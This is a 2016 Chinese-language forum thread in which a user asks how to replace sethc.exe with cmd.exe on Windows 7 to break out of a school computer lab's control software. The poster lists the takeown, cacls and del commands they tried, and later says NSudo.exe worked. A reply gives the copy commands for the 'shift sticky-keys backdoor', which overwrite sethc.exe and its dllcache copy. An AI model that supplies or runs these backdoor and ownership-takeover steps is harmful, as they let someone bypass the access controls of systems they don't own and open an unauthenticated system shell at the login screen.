如何用 cmd 命令替换 sethc.exe? takeown 不管用

This topic created in 3548 days ago, the information mentioned may be changed or developed.

takeown /f c:\Windows\System32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
这两步成功了
del /F /S /Q /A c:\Windows\System32\sethc.exe
的时候又拒绝访问了
替换 cmd 学校机房解除控制用，
虚拟机上总是成功的..
WIN7旗舰版

Supplement 1 · Sep 19, 2016

找到了个 NSudo.exe..简单暴力

4 replies • 2016-09-19 12:16:59 +08:00

popok

Sep 19, 2016 via iPhone

你都能进系统了，直接手动替换也行吧。
你替换时观察一下，是不是有系统备份文件，比如 c:\windows\repair\这里，可能自动给你换回来了。

你可以先搜索 c 盘 sethc.exe ，然后搜索结果页不要关，执行你的替换命令，观察结果页里的文件大小变化

lzhd24

Sep 19, 2016

还记得经典的 shift 粘滞键后门吗？
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe /y
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe /y

popok

Sep 19, 2016 via iPhone

好吧，没看仔细。
原来是权限问题，我上一贴回复作废好了。哈哈

popok

Sep 19, 2016 via iPhone

你先用 whoami 命令看看你本地登录的帐号是不是 administrator ，然后执行命令后，看看文件所有权里有没有这个